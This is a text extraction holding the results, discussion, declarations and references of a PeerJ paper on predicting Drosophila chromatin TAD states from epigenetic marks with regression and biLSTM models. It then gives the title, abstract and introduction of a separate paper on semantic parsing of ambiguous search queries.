was Chriz, while the weights of Su(Hw) and CTCF were the smallest. As expected, Chriz factor was the top in the prioritization of the 18-features LR model. However, the next important features were histone marks H3K4me1 and H3K27me1, supporting the hypothesis of histone modifications as drivers of TAD folding in Drosophila. We used two approaches for the feature selection of RNN: use-one feature and drop-one feature. When each single chromatin mark was used as the only feature of each bin of the RNN input sequence for training, the best scores were obtained for Chriz and H3K4me2 (Figs. 4, 5 and 6), similarly to the LR models results. When we dropped out one of the five features, we got scores that are almost equal to the wMSE using the full dataset together. This does not hold for experiment with excluded Chriz, where wMSE increases. These results align with the outcome of use-one approach and while applying LR models. Similar results were obtained while using the broader dataset. The results of applying the same approach of omitting each feature one by one using the second dataset of features allowed the evaluation of the biological impact of the features. The corresponding wMSE Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 10/21 https://peerj.com https://doi.org/10.7717/peerjcs.307/fig-4 http://dx.doi.org/10.7717/peerj-cs.307 Figure 5 Weighted MSE using four out of five chromatin marks features together as the biLSTM RNN input. Each colour corresponds to the feature that was excluded from the input. Note that the model is af- fected the most when Chriz factor is dropped from features. Full-size DOI: 10.7717/peerjcs.307/fig-5 scores are presented in Fig. 6 as well as the result of training the model on all features together. The results of omitting each feature one by one while using the second dataset of features are almost identical as we expected. It could be explained by the fact that most of the features are strongly correlated. TAD state prediction models are transferable between cell lines of Drosophila In order to explore the transferability of the results between various Drosophila cell lines, we have applied the full pipeline for Schneider-2 and Kc167 cells from late embryos and DmBG3-c2 (BG3) cells from the central nervous system of third-instar larvae. Across all cell lines, the biLSTM model has gained the best evaluation scores (Table 3). On average, the smallest errors were produced on the test set of the BG3 cell line. Notably, the selected top features are robust between cell lines. The results of the usage of each feature separately for each of the cell lines can be found in Fig. S1. Chriz was identified as the most influencing feature for Schneider-2 and BG3 while being in the top four features for Kc167. Histone modifications H3K4me2 and H3K4me3 gain very high scores on each dataset. However, CTCF was found in the top of the influencing chromatin marks only on the Kc167, while insulator Su(Hw) constantly scores almost the worst wMSE across all cell lines. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 11/21 https://peerj.com https://doi.org/10.7717/peerjcs.307/fig-5 http://dx.doi.org/10.7717/peerj-cs.307#supp-1 http://dx.doi.org/10.7717/peerj-cs.307 Figure 6 Weighted MSE on the test dataset while using each chromatin mark either as a single feature (blue line) or excluding it from the biLSTM RNN input (yellow line). Full-size DOI: 10.7717/peerjcs.307/fig-6 Table 3 Weighted MSE on cross-validation of all methods for each cell line and while using them to- gether. Lower wMSE orresponds to better quality of prediction. Method Schneider-2 Kc167 DmBG3-c2 All Constant prediction 1.62±0.09 1.53±0.06 1.36±0.05 1.51±0.04 Linear regression 1.14±0.08 1.01±0.06 0.91±0.08 1.04±0.04 Linear regression + L1 1.12±0.07 1.04±0.06 0.95±0.07 1.05±0.04 Linear regression + L2 1.12±0.07 1.01±0.06 0.9±0.08 1.03±0.04 Linear regression + L1 + L2 1.11±0.07 1.02±0.06 0.91±0.07 1.03±0.04 Gradient boosting 1.07±0.06 0.98±0.07 0.86±0.08 0.96±0.04 biLSTM 64 units & 6 bins 0.86±0.04 0.83±0.04 0.73±0.01 0.78±0.01 The all-cell-lines model improves prediction for most cell lines Finally, we tested the improvement of the prediction models that can be achieved by merging the information about all cell lines. For that, we merged all three cell lines as the input dataset and used the all-cell-lines model for the prediction on each cell line. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 12/21 https://peerj.com https://doi.org/10.7717/peerjcs.307/fig-6 http://dx.doi.org/10.7717/peerj-cs.307 The gain of scores was the highest for Schneider-2 and Kc167, while BG3 demonstrated a slight decline in the prediction quality. We also note that biLSTM was less affected by the addition of cross-cell-line data among all models. In general, the quality of the prediction has mostly improved, suggesting the universality of the biological mechanisms of the TAD formation between three cell lines (two embryonic and one neuronal) of Drosophila. DISCUSSION Here, we developed the Hi-ChIP-ML framework for the prediction of chromatin folding patterns for a set of input epigenetic characteristics of the genome. Using this framework, we provide the proof of concept that incorporation of information about the context of genomic regions is important for the TAD status and spatial folding of genomic regions. Our approach allows for diverse biological insights into the process of TAD formation in Drosophila, identified using the features importance analysis. Firstly, we found that chromodomain protein Chriz, or Chromator (Eggert, Gortchakov & Saumweber, 2004), might be an important player of the TAD formation mechanism. Recurrent neural networks that used only Chriz as the input produced the highest scores among all RNNs using single epigenetic marks (Figs. 4, 6). Moreover, the removal of Chriz strongly influenced the prediction scores when four out of five selected ChIP features were together (Fig. 5). All linear models assigned the highest regression weight to the Chriz input signal. Further, with the L1 regularization Chriz was the only feature that the model selected for prediction. This chromodomain protein is known to be specific for the inter-bands of Drosophila melanogaster chromosomes (Chepelev et al., 2012), TAD boundaries and the inter-TAD regions (Ulianov et al., 2016), while profiles of proteins that are typically over-represented in inter-bands (including Chriz) correspond to TAD boundaries in embryonic nuclei (Zhimulev et al., 2014). The binding sites of insulator proteins Chriz and BEAF-32 are enriched at TAD boundaries (Hou et al., 2012; Hug et al., 2017; Ramírez et al., 2018; Sexton et al., 2012). Wang et al. (2018) reported the predictor of the boundaries based on the combination of BEAF-32 and Chriz. This might explain BEAF-32 achieving the third rank of the predictability score. Secondly, the application of the recurrent neural network using each of the selected chromatin marks features separately (Fig. 6) has revealed a strong predictive power of active histone modifications such as H3K4me2. This result aligns with the fact that H3K4me2 defines the transcription factor binding regions in different cells, about 90% of transcription factor binding regions (TFBRs) on average overlap with H3K4me2 regions, and use H3K4me2 together with H3K27ac regions to improve the prediction of TFBRs (Wang, Li & Hu, 2014). Histone modifications H3K4me3, H3K27ac, H3K4me1, H3K4me3, H4K16ac, and other active chromatin marks are also enriched in inter-TADs and TAD boundaries (Ulianov et al., 2016). In addition, H3K27ac and H3K4me1 distinguish poised and active enhancers (Barski et al., 2007; Creyghton et al., 2010; Rada-Iglesias et al., 2011). Thirdly, models using Su(Hw) and CTCF perform as expected given that, for the prediction of TAD boundaries, the binding of insulator proteins Su(Hw) and CTCF have Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 13/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.307 performed worse than other chromatin marks (Ulianov et al., 2016). In Drosophila, the absence of strong enrichment of CTCF at TAD boundaries and preferential location of Su(Hw) inside TADs implies that CTCF- and Su(Hw)-dependent insulation is not a major determinant of TAD boundaries. Our results also demonstrate that the impact of Su(Hw) and CTCF is low for both proteins. Thus, our framework not only accurately predicts positions of TADs in the genome but also highlights epigenetic features relevant for the TAD formation. Importantly, the use of adjacent DNA bins created a meaningful biological context and enabled the training of a comprehensive ML model, strongly improving the evaluation scores of the best RNN model. We note that there are few limitations to our approach. In particular, the resolution of our analysis is 20 kb, while TAD properties and TAD-forming factors can be different at finer resolutions (Wang et al., 2018; Rowley et al., 2017; Rowley et al., 2019). On the other hand, the use of coarse models allowed us to test the approach and select the best parameters while training the models multiple times efficiently. The training of the model for Hi-C with the resolution up to 500 bp presents a promising direction for future work, leading to the clarification of other factors’ roles in the formation of smaller TAD boundaries that are beyond the resolution of our models. We also note that transitional gamma is just one of multiple measures of the TAD state for a genomic region. We motivate the use of transitional gamma by the fact that it is a parameter-independent way of assessing TAD prominence calculated for the entire map. This guarantees the incorporation of the information about the interactions of the whole chromosome at all genomic ranges, which is not the case for other approaches such as the Insulation Score (Crane et al., 2015), D-score (Stadhouders et al., 2018), and Directionality Index (Dixon et al., 2012). On the other hand, the presented pipeline may be easily transferred to predict these scores as target values, which is an important direction for the extension of the work. Here we selected features that had been reported to be associated with the chromatin structure. We note there might be other factors contributing to the TAD formation that were not included in our analysis. The exploration of a broader set of cell types might be a promising direction for this research, as well as the integration of various biological features, such as raw DNA sequence, to the presented models. We also anticipate promising outcomes of applying our approach to study the chromatin folding in various species except for Drosophila. The code is open-source and can be easily adapted to various related tasks. CONCLUSIONS To sum up, we developed an approach for analysis of a set of chromatin marks as predictors of the TAD state for a genomic locus. We demonstrate a strong empirical performance of linear regression, gradient boosting, and recurrent neural network prediction models for several cell lines and a number of chromatin marks. The selected set of chromatin marks can reliably predict the chromatin folding patterns in Drosophila. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 14/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.307 Recurrent neural networks incorporate the information about epigenetic surroundings. The highest prediction scores were obtained by the models with the biologically interpretable input size of 120 kb that aligns with the average TAD size for the 20 kb binning in Drosophila. Thus, we propose that the explicit accounting for linearly ordered bins is important for chromatin structure prediction. The top-influencing TAD-forming factors of Drosophila are Chriz and histone modification H3K4me2. The chromatin factors that influence the prediction most are stable across the cell lines, which suggests the universality of the biological mechanisms of TAD formation for two embryonic and one neuronal Drosophila cell line. On the other hand, the training of models on all cell lines simultaneously generally improves the prediction. The implemented pipeline called Hi-ChIP-ML is open-source. The methods can be used to explore the 3D chromatin structure of various species and may be adapted to any similar biological problem and dataset. The code is freely available at: https://github.com/MichalRozenwald/Hi-ChIP-ML. ADDITIONAL INFORMATION AND DECLARATIONS Funding This study was supported by the Russian Science Foundation, grant number 19-74-00112, and Skoltech Fellowship in Systems Biology for Aleksandra A. Galitsyna. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Russian Science Foundation: 19-74-00112. Skoltech Fellowship in Systems Biology. Competing Interests Mikhail Gelfand is an Academic Editor for PeerJ. Grigory V. Sapunov is employed by Intento, Inc. Author Contributions • Michal B. Rozenwald conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Aleksandra A. Galitsyna conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Grigory V. Sapunov, Ekaterina E. Khrameeva and Mikhail S. Gelfand conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 15/21 https://peerj.com https://github.com/MichalRozenwald/Hi-ChIP-ML http://dx.doi.org/10.7717/peerj-cs.307 Data Availability The following information was supplied regarding data availability: 1. The code and the data are available at GitHub: https://github.com/MichalRozenwald/ Hi-ChIP-ML 2. The chromatin marks are available at modEncode using the following IDs: # name Schneider-2 Kc167 DmBG3-c2 1 Chriz 279 277 275 2 CTCF 3749 3749 3671 3 Su(Hw) 5147 3801 3717 4 BEAF-32 922 3745 3663 5 CP190 925 3748 3666 6 GAF 3753 3753 2651 7 H3K4me1 3760 5138 2653 8 H3K4me2 965 4935 2654 9 H3K4me3 3761 5141 967 10 H3K9me2 311 938 310 11 H3K9me3 4183 3013 312 12 H3K27ac 3757 3757 295 13 H3K27me1 3943 3942 3941 14 H3K27me3 298 5136 297 15 H3K36me1 3170 3003 299 16 H3K36me3 303 302 301 17 H4K16ac 320 318 316 18 RNA-polymerase-II 329 328 950 3. The Hi-C data is available at NCBI GEO: GSE69013. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.307#supplemental-information. REFERENCES Barski A, Cuddapah S, Cui K, Roh T-Y, Schones DE, Wang Z, Wei G, Chepelev I, Zhao K. 2007. High-resolution profiling of histone methylations in the human genome. Cell 129(4):823–837 DOI 10.1016/j.cell.2007.05.009. Belokopytova PS, Nuriddinov MA, Mozheiko EA, Fishman D, Fishman V. 2020. Quantitative prediction of enhancer–promoter interactions. Genome Research 30(1):72–84 DOI 10.1101/gr.249367.119. Bkhetan ZA, Plewczynski D. 2018. Three-dimensional epigenome statistical model: genome-wide chromatin looping prediction. Scientific Reports 8:5217 DOI 10.1038/s41598-018-23276-8. Chathoth KT, Zabet NR. 2019. Chromatin architecture reorganization during neu- ronal cell differentiation in Drosophila genome. Genome Research 29(4):613–625 DOI 10.1101/gr.246710.118. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 16/21 https://peerj.com https://github.com/MichalRozenwald/Hi-ChIP-ML https://github.com/MichalRozenwald/Hi-ChIP-ML https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE69013 http://dx.doi.org/10.7717/peerj-cs.307#supplemental-information http://dx.doi.org/10.7717/peerj-cs.307#supplemental-information http://dx.doi.org/10.1016/j.cell.2007.05.009 http://dx.doi.org/10.1101/gr.249367.119 http://dx.doi.org/10.1038/s41598-018-23276-8 http://dx.doi.org/10.1101/gr.246710.118 http://dx.doi.org/10.7717/peerj-cs.307 Chepelev I, Wei G, Wangsa D, Tang Q, Zhao K. 2012. Characterization of genome- wide enhancer-promoter interactions reveals co-expression of interacting genes and modes of higher order chromatin organization. Cell Research 22(3):490–503 DOI 10.1038/cr.2012.15. Crane E, Bian Q, McCord RP, Lajoie BR, Wheeler BS, Ralston EJ, Uzawa S, Dekker J, Meyer BJ. 2015. Condensin-driven remodelling of x chromosome topology during dosage compensation. Nature 523(7559):240–244 DOI 10.1038/nature14450. Creyghton MP, Cheng AW, Welstead GG, Kooistra T, Carey BW, Steine EJ, Hanna J, Lodato MA, Frampton GM, Sharp PA, Boyer LA, Young RA, Jaenisch R. 2010. Hi- stone H3K27ac separates active from poised enhancers and predicts developmental state. Proceedings of the National Academy of Sciences of the United States of America 107(50):21931–21936 DOI 10.1073/pnas.1016071107. Cristescu B-C, Borsos Z, Lygeros J, Martínez MR, Rapsomaniki MA. 2018. Inference of the three-dimensional chromatin structure and its temporal behavior. ArXiv preprint. arXiv:1811.09619. Dixon JR, Selvaraj S, Yue F, Kim A, Li Y, Shen Y, Hu M, Liu JS, Ren B. 2012. Topological domains in mammalian genomes identified by analysis of chromatin interactions. Nature 485(7398):376–380 DOI 10.1038/nature11082. Eggert H, Gortchakov A, Saumweber H. 2004. Identification of the Drosophila interband-specific protein Z4 as a DNA-binding zinc-finger protein deter- mining chromosomal structure. Journal of Cell Science 117(18):4253–4264 DOI 10.1242/jcs.01292. Eraslan G, Avsec Ž, Gagneur J, Theis FJ. 2019. Deep learning: new computational modelling techniques for genomics. Nature Reviews Genetics 20(7):389–403. Farré P, Heurteau A, Cuvier O, Emberly E. 2018. Dense neural networks for predicting chromatin conformation. BMC Bioinformatics 19(1):1–12 DOI 10.1186/s12859-018-2286-z. Filion GJ, Van Bemmel JG, Braunschweig U, Talhout W, Kind J, Ward LD, Brugman W, De Castro IJ, Kerkhoven RM, Bussemaker HJ, Van Steensel B. 2010. Systematic protein location mapping reveals five principal chromatin types in Drosophila cells. Cell 143(2):212–224 DOI 10.1016/j.cell.2010.09.009. Filippova D, Patro R, Duggal G, Kingsford C. 2014. Identification of alternative topological domains in chromatin. Algorithms for Molecular Biology 9(1):14 DOI 10.1186/1748-7188-9-14. Fudenberg G, Kelley DR, Pollard KS. 2019. Predicting 3D genome folding from DNA sequence. bioRxiv 800060 DOI 10.1101/800060. Gan M, Li W, Jiang R. 2019. EnContact: predicting enhancer-enhancer contacts using sequence-based deep learning model. PeerJ 2019(9):1–19 DOI 10.7717/peerj.7657. Gan W, Luo J, Li YZ, Guo JL, Zhu M, Li ML. 2019. A computational method to predict topologically associating domain boundaries combining histone Marks and sequence information. BMC Genomics 20(13):1–12 DOI 10.1186/s12864-018-5379-1. Gong Y, Lazaris C, Sakellaropoulos T, Lozano A, Kambadur P, Ntziachristos P, Aifantis I, Tsirigos A. 2018. Stratification of TAD boundaries reveals preferential insulation Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 17/21 https://peerj.com http://dx.doi.org/10.1038/cr.2012.15 http://dx.doi.org/10.1038/nature14450 http://dx.doi.org/10.1073/pnas.1016071107 http://arXiv.org/abs/1811.09619 http://dx.doi.org/10.1038/nature11082 http://dx.doi.org/10.1242/jcs.01292 http://dx.doi.org/10.1186/s12859-018-2286-z http://dx.doi.org/10.1016/j.cell.2010.09.009 http://dx.doi.org/10.1186/1748-7188-9-14 http://dx.doi.org/10.1101/800060 http://dx.doi.org/10.7717/peerj.7657 http://dx.doi.org/10.1186/s12864-018-5379-1 http://dx.doi.org/10.7717/peerj-cs.307 of super-enhancers by strong boundaries. Nature Communications 9(1):542 DOI 10.1038/s41467-018-03017-1. Graves A. 2012. Supervised sequence labelling. In: Supervised sequence labelling with recurrent neural networks. Studies in computational intelligence, vol 385. Berlin: Springer, 5–13 DOI 10.1007/978-3-642-24797-2_2. Graves A, Jaitly N, Mohamed A-R. 2013. Hybrid speech recognition with deep bidi- rectional LSTM. In: 2013 IEEE workshop on automatic speech recognition and understanding. IEEE, 273–278. Hochreiter S, Schmidhuber J. 1997. Long short-term memory. Neural Computation 9(8):1735–1780 DOI 10.1162/neco.1997.9.8.1735. Hou C, Li L, Qin ZS, Corces VG. 2012. Gene density, transcription, and insulators con- tribute to the partition of the Drosophila genome into physical domains. Molecular Cell 48(3):471–484 DOI 10.1016/j.molcel.2012.08.031. Hug CB, Grimaldi AG, Kruse K, Vaquerizas JM. 2017. Chromatin architecture emerges during zygotic genome activation independent of transcription. Cell 169(2):216–228 DOI 10.1016/j.cell.2017.03.024. Ibn-Salem J, Andrade-Navarro MA. 2019. 7C: computational chromosome conforma- tion capture by correlation of ChIP-seq at CTCF motifs. BMC Genomics 20(1):777 DOI 10.1186/s12864-019-6088-0. Jing F, Zhang S, Cao Z, Zhang S. 2019. An integrative framework for combining se- quence and epigenomic data to predict transcription factor binding sites using deep learning. In: IEEE/ACM transactions on computational biology and bioinformatics. Piscataway: IEEE. Johnson DS, Mortazavi A, Myers RM, Wold B. 2007. Genome-wide mapping of in vivo protein-DNA interactions. Science 316(5830):1497–1502 DOI 10.1126/science.1141319. Kharchenko PV, Alekseyenko AA, Schwartz YB, Minoda A, Riddle NC, Ernst J, Sabo PJ, Larschan E, Gorchakov AA, Gu T, Linder-Basso D, Plachetka A, Shanower G, Tolstorukov MY, Luquette LJ, Xi R, Jung YL, Park RW, Bishop EP, Canfield TK, Sandstrom R, Thurman RE, MacAlpine DM, Stamatoyannopoulos JA, Kellis M, Elgin SCR, Kuroda MI, Pirrotta V, Karpen GH, Park PJ. 2011. Compre- hensive analysis of the chromatin landscape in Drosophila melanogaster. Nature 471(7339):480–485 DOI 10.1038/nature09725. Kingma DP, Ba J. 2014. Adam: a method for stochastic optimization. ArXiv preprint. arXiv:1412.6980. Krijger PHL, De Laat W. 2016. Regulation of disease-associated gene expression in the 3D genome. Nature Reviews Molecular Cell Biology 17(12):771–782 DOI 10.1038/nrm.2016.138. Li Z, Dai Z. 2020. SRHiC: a deep learning model to enhance the resolution of Hi-C data. Frontiers in Genetics 11:353 DOI 10.3389/fgene.2020.00353. Li W, Wong WH, Jiang R. 2019. DeepTACT: Predicting 3D chromatin contacts via boot- strapping deep learning. Nucleic Acids Research 47(10):e60 DOI 10.1093/nar/gkz167. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 18/21 https://peerj.com http://dx.doi.org/10.1038/s41467-018-03017-1 http://dx.doi.org/10.1007/978-3-642-24797-2_2 http://dx.doi.org/10.1162/neco.1997.9.8.1735 http://dx.doi.org/10.1016/j.molcel.2012.08.031 http://dx.doi.org/10.1016/j.cell.2017.03.024 http://dx.doi.org/10.1186/s12864-019-6088-0 http://dx.doi.org/10.1126/science.1141319 http://dx.doi.org/10.1038/nature09725 http://arXiv.org/abs/1412.6980 http://dx.doi.org/10.1038/nrm.2016.138 http://dx.doi.org/10.3389/fgene.2020.00353 http://dx.doi.org/10.1093/nar/gkz167 http://dx.doi.org/10.7717/peerj-cs.307 Lieberman-Aiden E, Van Berkum NL, Williams L, Imakaev M, Ragoczy T, Telling A, Amit I, Lajoie BR, Sabo PJ, Dorschner MO, Sandstrom R, Bernstein B, Bender MA, Groudine M, Gnirke A, Stamatoyannopoulos J, Mirny LA, Lander ES, Dekker J. 2009. Comprehensive mapping of long-range interactions reveals folding principles of the human genome. Science 326(5950):289–293 DOI 10.1126/science.1181369. Liu Q, Lv H, Jiang R. 2019. hicGAN infers super resolution Hi-C data with generative adversarial networks. Bioinformatics 35(14):i99–i107 DOI 10.1093/bioinformatics/btz317. Lupiáñez DG, Spielmann M, Mundlos S. 2016. Breaking TADs: how alterations of chromatin domains result in disease. Trends in Genetics 32(4):225–237 DOI 10.1016/j.tig.2016.01.003. Martens LD, Faust O, Pirvan L, Bihary D, Samarajiwa SA. 2020. Identifying regulatory and spatial genomic architectural elements using cell type independent machine and deep learning models. bioRxiv. DOI 10.1101/2020.04.19.049585. Pedregosa F, Varoquaux G, Gramfort A, Michel V, Thirion B, Grisel O, Blondel M, Prettenhofer P, Weiss R, Dubourg V, Vanderplas J, Passos A, Cournapeau D, Brucher M, Perrot M, Duchesnay E. 2011. Scikit-learn: machine learning in python. Journal of Machine Learning Research 12:2825–2830. Rada-Iglesias A, Bajpai R, Swigut T, Brugmann SA, Flynn RA, Wysocka J. 2011. A unique chromatin signature uncovers early developmental enhancers in humans. Nature 470(7333):279–283 DOI 10.1038/nature09692. Ramírez F, Bhardwaj V, Arrigoni L, Lam KC, Grüning BA, Villaveces J, Habermann B, Akhtar A, Manke T. 2018. High-resolution TADs reveal DNA sequences underlying genome organization in flies. Nature communications 9(1):1–15 DOI 10.1038/s41467-017-02088-w. Rao SSP, Huntley MH, Durand NC, Stamenova EK, Bochkov ID, Robinson JT, Sanborn AL, Machol I, Omer AD, Lander ES, Aiden EL. 2014. A 3D map of the human genome at kilobase resolution reveals principles of chromatin looping. Cell 159(7):1665–1680 DOI 10.1016/j.cell.2014.11.021. Ren B, Robert F, Wyrick JJ, Aparicio O, Jennings EG, Simon I, Zeitlinger J, Schreiber J, Hannett N, Kanin E, Volkert TL, Wilson CJ, Bell SP, Young RA. 2000. Genome- wide location and function of DNA binding proteins. Science 290(5500):2306–2309 DOI 10.1126/science.290.5500.2306. Rowley MJ, Lyu X, Rana V, Ando-Kuri M, Karns R, Bosco G, Corces VG. 2019. Condensin II counteracts cohesin and RNA polymerase II in the establishment of 3D chromatin organization. Cell Reports 26(11):2890–2903 DOI 10.1016/j.celrep.2019.01.116. Rowley MJ, Nichols MH, Lyu X, Ando-Kuri M, Rivera ISM, Hermetz K, Wang P, Ruan Y, Corces VG. 2017. Evolutionarily conserved principles predict 3D chromatin organization. Molecular Cell 67(5):837–852 DOI 10.1016/j.molcel.2017.07.022. Schreiber J, Libbrecht M, Bilmes J, Noble WS. 2017. Nucleotide sequence and DNaseI sensitivity are predictive of 3D chromatin architecture. bioRxiv. 14 DOI 10.1101/103614. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 19/21 https://peerj.com http://dx.doi.org/10.1126/science.1181369 http://dx.doi.org/10.1093/bioinformatics/btz317 http://dx.doi.org/10.1016/j.tig.2016.01.003 http://dx.doi.org/10.1101/2020.04.19.049585 http://dx.doi.org/10.1038/nature09692 http://dx.doi.org/10.1038/s41467-017-02088-w http://dx.doi.org/10.1016/j.cell.2014.11.021 http://dx.doi.org/10.1126/science.290.5500.2306 http://dx.doi.org/10.1016/j.celrep.2019.01.116 http://dx.doi.org/10.1016/j.molcel.2017.07.022 http://dx.doi.org/10.1101/103614 http://dx.doi.org/10.7717/peerj-cs.307 Schuster M, Paliwal K. 1997. Bidirectional recurrent neural networks. IEEE Transactions on Signal Processing 45(11):2673–2681 DOI 10.1109/78.650093. Schwessinger R, Gosden M, Downes D, Brown R, Telenius J, Teh YW, Lunter G, Hughes JR. 2019. DeepC: Predicting chromatin interactions using megabase scaled deep neural networks and transfer learning. bioRxiv. 724005 DOI 10.1101/724005. Sexton T, Yaffe E, Kenigsberg E, Bantignies F, Leblanc B, Hoichman M, Par- rinello H, Tanay A, Cavalli G. 2012. Three-dimensional folding and func- tional organization principles of the Drosophila genome. Cell 148(3):458–472 DOI 10.1016/j.cell.2012.01.010. Singh S, Yang Y, Poczos B, Ma J. 2019. Predicting enhancer-promoter interaction from genomic sequence with deep neural networks. Quantitative Biology 7(2):122–137 DOI 10.1007/s40484-019-0154-0. Stadhouders R, Vidal E, Serra F, Di Stefano B, Le Dily F, Quilez J, Gomez A, Collombet S, Berenguer C, Cuartero Y, Hecht J, Filion GJ, Beato M, Marti-Renom MA, Graf T. 2018. Transcription factors orchestrate dynamic interplay between genome topology and gene regulation during cell reprogramming. Nature Genetics 50(2):238–249 DOI 10.1038/s41588-017-0030-7. Trieu T, Martinez-Fundichely A, Khurana E. 2020. DeepMILO: a deep learning approach to predict the impact of non-coding sequence variants on 3D chromatin structure. Genome Biology 21(1):1–11 DOI 10.1186/s13059-019-1906-x. Ulianov SV, Khrameeva EE, Gavrilov AA, Flyamer IM, Kos P, Mikhaleva EA, Penin AA, Logacheva MD, Imakaev MV, Chertovich A, Gelfand MS, Shevelyov YY, Razin SV. 2016. Active chromatin and transcription play a key role in chromosome partitioning into topologically associating domains. Genome Research 26(1):70–84 DOI 10.1101/gr.196006.115. Wang Y, Li X, Hu H. 2014. H3K4me2 reliably defines transcription factor binding regions in different cells. Genomics 103(2):222–228 DOI 10.1016/j.ygeno.2014.02.002. Wang Q, Sun Q, Czajkowsky DM, Shao Z. 2018. Sub-kb Hi-C in D. melanogaster reveals conserved characteristics of TADs between insect and mammalian cells. Nature Communications 9(1):1–8 DOI 10.1038/s41467-017-02088-w. Waterston R, Celniker S, Snyder M, White K, Henikoff S, Karpen G. 2009. Unlocking the secrets of the genome. Nature 459(7249):927–930 DOI 10.1038/459927a. Whalen S, Truty RM, Pollard KS. 2016. Enhancer–promoter interactions are encoded by complex genomic signatures on looping chromatin. Nature Genetics 48(5):488–496 DOI 10.1038/ng.3539. Yan X, Su X. 2009. Linear regression analysis: theory and computing. Singapore: World Scientific. Yuan Y, Shi Y, Su X, Zou X, Luo Q, Feng DD, Cai W, Han Z-G. 2018. Cancer type pre- diction based on copy number aberration and chromatin 3D structure with convolu- tional neural networks. BMC Genomics 19(6):565 DOI 10.1186/s12864-018-4919-z. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 20/21 https://peerj.com http://dx.doi.org/10.1109/78.650093 http://dx.doi.org/10.1101/724005 http://dx.doi.org/10.1016/j.cell.2012.01.010 http://dx.doi.org/10.1007/s40484-019-0154-0 http://dx.doi.org/10.1038/s41588-017-0030-7 http://dx.doi.org/10.1186/s13059-019-1906-x http://dx.doi.org/10.1101/gr.196006.115 http://dx.doi.org/10.1016/j.ygeno.2014.02.002 http://dx.doi.org/10.1038/s41467-017-02088-w http://dx.doi.org/10.1038/459927a http://dx.doi.org/10.1038/ng.3539 http://dx.doi.org/10.1186/s12864-018-4919-z http://dx.doi.org/10.7717/peerj-cs.307 Zeng W, Wang Y, Jiang R. 2020. Integrating distal and proximal information to predict gene expression via a densely connected convolutional neural network. Bioinformat- ics 36(2):496–503. Zeng W, Wu M, Jiang R. 2018. Prediction of enhancer-promoter interactions via natural language processing. BMC Genomics 19(Suppl 2):84 DOI 10.1186/s12864-018-4459-6. Zhimulev IF, Zykova TY, Goncharov FP, Khoroshko VA, Demakova OV, Semeshin VF, Pokholkova GV, Boldyreva LV, Demidova DS, Babenko VN, Demakov SA, Belyaeva ES. 2014. Genetic organization of interphase chromosome bands and interbands in Drosophila melanogaster. PLOS ONE 9(7):1–16 DOI 10.1371/journal.pone.0101631. Rozenwald et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.307 21/21 https://peerj.com http://dx.doi.org/10.1186/s12864-018-4459-6 http://dx.doi.org/10.1371/journal.pone.0101631 http://dx.doi.org/10.7717/peerj-cs.307 work_p3f4enbxxbetzcxwlxqv6hfqt4 ---- Semantic Parsing of Ambiguous Input through Paraphrasing and Verification Philip Arthur, Graham Neubig, Sakriani Sakti, Tomoki Toda, Satoshi Nakamura Graduate School of Information Science, Nara Institute of Science and Technology, Japan {philip.arthur.om0, neubig, ssakti, tomoki, s-nakamura}@is.naist.jp Abstract We propose a new method for semantic pars- ing of ambiguous and ungrammatical input, such as search queries. We do so by build- ing on an existing semantic parsing framework that uses synchronous context free grammars (SCFG) to jointly model the input sentence and output meaning representation. We gener- alize this SCFG framework to allow not one, but multiple outputs. Using this formalism, we construct a grammar that takes an ambigu- ous input string and jointly maps it into both a meaning representation and a natural lan- guage paraphrase that is less ambiguous than the original input. This paraphrase can be used to disambiguate the meaning representa- tion via verification using a language model that calculates the probability of each para- phrase.1 1 Introduction Semantic parsing (SP) is the problem of parsing a given natural language (NL) sentence into a meaning representation (MR) conducive to further processing by applications. One of the major challenges in SP stems from the fact that NL is rife with ambiguities. For example, even the simple sentence “Where can we eat a steak in Kobe?” contains syntactic ambi- guities (“eat in Kobe” or “steak in Kobe”?), quan- tifier scope ambiguities (do we all eat one steak, or each eat one steak?), and word sense ambigui- ties (is Kobe a city in Japan; or an NBA basketball 1Tools to replicate our experiments can be found at http://isw3.naist.jp/~philip-a/tacl2015/index.html. player?). Previous works using statistical models along with formalisms such as combinatorial cat- egorial grammars, synchronous context free gram- mars, and dependency based compositional seman- tics have shown notable success in resolving these ambiguities (Zettlemoyer and Collins, 2005; Wong and Mooney, 2007; Liang et al., 2011; Kwiatkowski et al., 2013). Much previous work on SP has focused on the case of answering natural language queries to a database of facts, where the queries generally take the form of full sentences such as “What is the height of Kobe Bryant?” While answering these ques- tions provides an excellent first step to natural lan- guage information access, in many cases the input is not a full sentence, but something more underspec- ified and ungrammatical. For example, this is the case for keyword-based search queries (Sajjad et al., 2012) or short dialogue utterances (Zettlemoyer and Collins, 2007). Specifically taking the example of search queries, users tend to omit some of the function words and grammatical constructs in the language to make a more concise query. The first column of Table 1 illustrates several search queries of the pattern “Kobe X” where X is another word. From these queries and their MRs in column two, we can see that there are several kinds of ambiguity, including not only the distinction between Kobe as city or a basketball player as in the 